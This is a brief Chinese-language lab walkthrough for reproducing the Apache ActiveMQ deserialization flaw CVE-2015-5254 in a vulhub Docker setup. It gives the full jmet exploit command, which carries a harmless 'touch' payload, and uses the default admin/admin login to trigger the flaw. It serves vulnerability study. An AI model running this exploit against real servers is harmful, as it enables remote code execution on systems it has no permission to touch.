Apache ActiveMQ序列化漏洞(CVE-2015-5254)
1.环境搭建
1.1 下载vulhub
使用vulhub进行环境搭建,具体步骤可参考这里。
1.1 启动环境
cd /vulhub/activemq/CVE-2015-5254
docker-compose up -d
通过本机IP:8161即可访问
2.漏洞复现
2.1 下载EXP
下载地址:https://github.com/matthiaskaiser/jmet
下载可以使用maven打成jar包或者从其他地方地址下载jar包
2.2 执行命令
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/successMQ" -Yp ROME 192.168.120.159 61616
执行之后登录activeMQ管理页面(admin/admin登录)
查看添加的队列中的信息:
http://192.168.120.159:8161/admin/browse.jsp?JMSDestination=event,
查看事件,可以看到刚刚的事件,点击查看
查看事件,触发漏洞:
查看tmp目录下是否写入successMQ